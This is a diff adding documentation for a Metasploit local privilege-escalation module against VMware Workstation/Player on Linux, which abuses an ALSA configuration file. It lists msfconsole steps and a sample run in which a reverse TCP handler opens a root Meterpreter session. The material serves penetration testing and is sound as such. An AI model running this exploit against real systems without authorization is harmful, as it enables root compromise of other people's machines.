|
| 1 | +## Description |
| 2 | + |
| 3 | + This module exploits a vulnerability in VMware Workstation Pro and Player before version 12.5.6 on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + VMware Workstation Pro and VMware Workstation Player are the industry standard for running multiple operating systems as virtual machines on a single PC. Thousands of IT professionals, developers and businesses use Workstation Pro and Workstation Player to be more agile, more productive and more secure every day. |
| 9 | + |
| 10 | + This module has been tested successfully on: |
| 11 | + |
| 12 | + * VMware Player version 12.5.0 on Debian Linux |
| 13 | + |
| 14 | + |
| 15 | +## Verification Steps |
| 16 | + |
| 17 | + 1. Start `msfconsole` |
| 18 | + 2. Get a session |
| 19 | + 3. Do: `use exploit/linux/local/vmware_alsa_config` |
| 20 | + 4. Do: `set SESSION [SESSION]` |
| 21 | + 5. Do: `check` |
| 22 | + 6. Do: `run` |
| 23 | + 7. You should get a new root session |
| 24 | + |
| 25 | + |
| 26 | +## Options |
| 27 | + |
| 28 | + **SESSION** |
| 29 | + |
| 30 | + Which session to use, which can be viewed with `sessions` |
| 31 | + |
| 32 | + **WritableDir** |
| 33 | + |
| 34 | + A writable directory file system path. (default: `/tmp`) |
| 35 | + |
| 36 | + |
| 37 | +## Scenarios |
| 38 | + |
| 39 | + ``` |
| 40 | + msf exploit(vmware_alsa_config) > check |
| 41 | +
|
| 42 | + [!] SESSION may not be compatible with this module. |
| 43 | + [+] Target version is vulnerable |
| 44 | + [+] The target is vulnerable. |
| 45 | + msf exploit(vmware_alsa_config) > run |
| 46 | +
|
| 47 | + [!] SESSION may not be compatible with this module. |
| 48 | + [*] Started reverse TCP handler on 172.16.191.181:4444 |
| 49 | + [+] Target version is vulnerable |
| 50 | + [*] Launching VMware Player... |
| 51 | + [*] Meterpreter session 2 opened (172.16.191.181:4444 -> 172.16.191.221:33807) at 2017-06-23 08:22:11 -0400 |
| 52 | + [*] Removing /tmp/.baVu7FwzlaIQyp |
| 53 | + [*] Removing /home/user/.asoundrc |
| 54 | +
|
| 55 | + meterpreter > getuid |
| 56 | + Server username: uid=0, gid=0, euid=0, egid=0 |
| 57 | + meterpreter > sysinfo |
| 58 | + Computer : 172.16.191.221 |
| 59 | + OS : Debian 8.8 (Linux 3.16.0-4-amd64) |
| 60 | + Architecture : x64 |
| 61 | + Meterpreter : x64/linux |
| 62 | + ``` |
| 63 | + |
0 commit comments